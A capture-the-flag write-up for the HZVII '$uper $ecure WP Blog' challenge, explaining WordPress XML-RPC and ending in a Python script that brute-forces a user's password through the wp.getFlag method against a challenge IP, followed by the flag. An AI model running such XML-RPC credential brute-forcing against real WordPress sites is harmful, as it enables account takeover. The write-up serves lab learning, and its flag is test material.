HZVII - $uper $ecure WP Blog

Description

WordPress accounted for 90% of all hacked CMS sites in 2018, some WordPress features should be disabled or removed completely if it is not being used to avoid any potential risks. Otherwise, it should at the very least be blocked from external access.

Task link

Steps

In wp challenges people generally think about vulnerable plugins which is not the case here so what is XML-RPC ?

XML-RPC on WordPress is actually an API or “application program interface“. It gives developers who make mobile apps, desktop apps and other services the ability to talk to your WordPress site. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things that you can do when logged into WordPress via the web interface. These include: Publish a post Edit a post Delete a post. Upload a new file (e.g. an image for a post) Get a list of comments Edit comments

The first thing to do now is send a POST request and list all the available methods , why ? cause that’s how we’ll know which actions are even possible to make and potentially use one of them for an attack.

The flag is not here :’(

A dictionnary link was founded in the method getFavouriteWords, maybe we need it later

Another method wp.getFlag seems interresting

The request need more arguements certainly the user & password :)

We know our user ;)

We can differentiate successful credentials by response length.

import requests


headers = {'Content-Type': 'text/xml'}

cracklist = open("dic.txt", "r")
for password in cracklist.readlines():
	password = password.strip("\n")
	xml = """<methodCall>
<methodName>wp.getFlag</methodName>
<params>
<param><value>psycor</value></param>
<param><value>"""+password+"""</value></param>
</params>
</methodCall>"""
	response = requests.post('http://51.83.41.116/xmlrpc.php', data=xml, headers=headers)
	if len(response.content) != 403:
		print("Password Founded:= "+password)
		print(response.text)
		break

The flag is : HZVII{50m371m35_xml_rpc_15_d4n63r0u5}